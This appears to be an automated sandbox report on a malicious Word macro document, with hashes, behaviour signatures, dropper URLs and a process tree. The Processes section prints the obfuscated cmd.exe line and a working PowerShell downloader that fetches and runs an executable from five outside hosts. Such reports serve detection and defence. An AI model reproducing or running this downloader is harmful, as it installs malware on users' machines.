Overview

overview

10

Static

static

8

0413f92d3b...18.doc

windows7-x64

10

0413f92d3b...18.doc

windows10-2004-x64

10

Analysis

  • max time kernel
    117s
  • max time network
    118s
  • platform
    windows7_x64
  • resource
    win7-20240215-en
  • resource tags

    arch:x64arch:x86image:win7-20240215-enlocale:en-usos:windows7-x64system
  • submitted
    28-04-2024 01:32

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    0413f92d3b2f6300a0ed5d6d362ef09c_JaffaCakes118.doc

  • Size

    65KB

  • MD5

    0413f92d3b2f6300a0ed5d6d362ef09c

  • SHA1

    e0ed8f26783e15a4fcc44b13997912295dc52bad

  • SHA256

    58c6de98959ad1e8fa0c907b8132e557f516944676936af659f6c80b1ac2804e

  • SHA512

    20ae21f5f8456c4cbb3a294f54aaf4c2ab7330a2d994f91eee7ac2f1a56b08697821af3158f3050d37878b166d8a9930ba12ccefb2f9339c87b921acef952388

  • SSDEEP

    768:cpJcaUitGAlmrJpmxlzC+w99NBz+1o80cZBv0fNNfw/i9m57MI2:cptJlmrJpmxlRw99NBz+a8vBi

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://abporter.org/zhniYMNIL
exe.dropper

http://bearinmindstrategies.com/of7Cpb8
exe.dropper

http://ondacapital.es/EwCyzzc
exe.dropper

http://landspa.ir/Nl9U64Eg0
exe.dropper

http://shoshana.ge/QwlUmzzVaF

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 8 IoCs
  • An obfuscated cmd.exe command-line is typically used to evade detection. 1 IoCs
  • Drops file in Windows directory 1 IoCs
  • Office loads VBA resources, possible macro or embedded object present
  • Modifies Internet Explorer settings 1 TTPs 31 IoCs
    adwarespyware
  • Modifies registry class 64 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 12 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\0413f92d3b2f6300a0ed5d6d362ef09c_JaffaCakes118.doc"
    1⤵
    • Drops file in Windows directory
    • Modifies Internet Explorer settings
    • Modifies registry class
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:2824
    • C:\Windows\splwow64.exe
      C:\Windows\splwow64.exe 12288
      2⤵
        PID:2948
      • C:\Windows\SysWOW64\cmd.exe
        cmd /V^:ON/C"^se^t ^Ke= ^ ^ ^ ^ ^ ^ ^ }^}{hc^tac};^kaer^b^;zkw$ ^m^e^tI^-^e^kovn^I;)zk^w^$ ,^Z^UV$(^eliFdao^ln^woD^.a^z^l${^yrt{)j^FV$^ ni ZUV$(^hcaerof;'^e^xe^.^'^+q^pv$+'\^'^+c^ilbu^p:vne$=^z^kw$;^'^45^6^' =^ q^pv$;)'^@'(^t^ilp^S^.^'^F^aV^z^zm^U^lwQ/^eg.^ana^h^s^o^h^s//^:p^t^t^h@0gE4^6U^9^lN/ri^.^ap^sdn^al//^:ptt^h@cz^zyCwE/^s^e^.^la^t^i^pac^a^dno//^:^ptth^@^8^b^pC^7f^o/moc.se^ige^tarts^dni^mnira^e^b//^:^pt^th^@^LIN^M^Y^in^hz/gr^o.re^tr^o^pb^a//:^pt^th'=^jFV^$^;^tn^eilCb^eW.^teN tc^e^jb^o-^w^en^=azl^$ ^lleh^srewop&&^for /^L %^D ^in (3^6^7;^-1^;^0)^d^o s^e^t ^if=!^if!!^Ke:~%^D,1!&&i^f %^D ^l^ss ^1 c^a^l^l %^if:^*^if^!=%"
        2⤵
        • Process spawned unexpected child process
        • An obfuscated cmd.exe command-line is typically used to evade detection.
        • Suspicious use of WriteProcessMemory
        PID:2500
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          powershell $lza=new-object Net.WebClient;$VFj='http://abporter.org/zhniYMNIL@http://bearinmindstrategies.com/of7Cpb8@http://ondacapital.es/EwCyzzc@http://landspa.ir/Nl9U64Eg0@http://shoshana.ge/QwlUmzzVaF'.Split('@');$vpq = '654';$wkz=$env:public+'\'+$vpq+'.exe';foreach($VUZ in $VFj){try{$lza.DownloadFile($VUZ, $wkz);Invoke-Item $wkz;break;}catch{}}
          3⤵
          • Blocklisted process makes network request
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:2696

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Roaming\Microsoft\Templates\Normal.dotm
      Filesize

      20KB

      MD5

      de92ba43c7e24e4385d52143723070d5

      SHA1

      6ebdacaf7f4c63befe0968ef409fb53053f00a63

      SHA256

      b4fd92553288eeb372000c72cce400eaff898b63b561e4483cbb958fa2750775

      SHA512

      5e861082883b51cdc77b057dddf72230b0b17aa1a19c9e5949dacaca47152768967839686119238978c4cf77ba3dbb213c00f16f83619e5e90fdac78e5621e1b

      Download Submit

    • memory/2824-11-0x0000000000610000-0x0000000000710000-memory.dmp

      Filesize

      1024KB

      Download

    • memory/2824-2-0x0000000070F4D000-0x0000000070F58000-memory.dmp

      Filesize

      44KB

      Download

    • memory/2824-8-0x0000000000610000-0x0000000000710000-memory.dmp

      Filesize

      1024KB

      Download

    • memory/2824-7-0x0000000000610000-0x0000000000710000-memory.dmp

      Filesize

      1024KB

      Download

    • memory/2824-9-0x0000000000610000-0x0000000000710000-memory.dmp

      Filesize

      1024KB

      Download

    • memory/2824-0-0x000000002F0C1000-0x000000002F0C2000-memory.dmp

      Filesize

      4KB

      Download

    • memory/2824-10-0x0000000000610000-0x0000000000710000-memory.dmp

      Filesize

      1024KB

      Download

    • memory/2824-6-0x0000000000610000-0x0000000000710000-memory.dmp

      Filesize

      1024KB

      Download

    • memory/2824-19-0x0000000070F4D000-0x0000000070F58000-memory.dmp

      Filesize

      44KB

      Download

    • memory/2824-20-0x0000000000610000-0x0000000000710000-memory.dmp

      Filesize

      1024KB

      Download

    • memory/2824-1-0x000000005FFF0000-0x0000000060000000-memory.dmp

      Filesize

      64KB

      Download

    • memory/2824-35-0x000000005FFF0000-0x0000000060000000-memory.dmp

      Filesize

      64KB

      Download

    • memory/2824-36-0x0000000070F4D000-0x0000000070F58000-memory.dmp

      Filesize

      44KB

      Download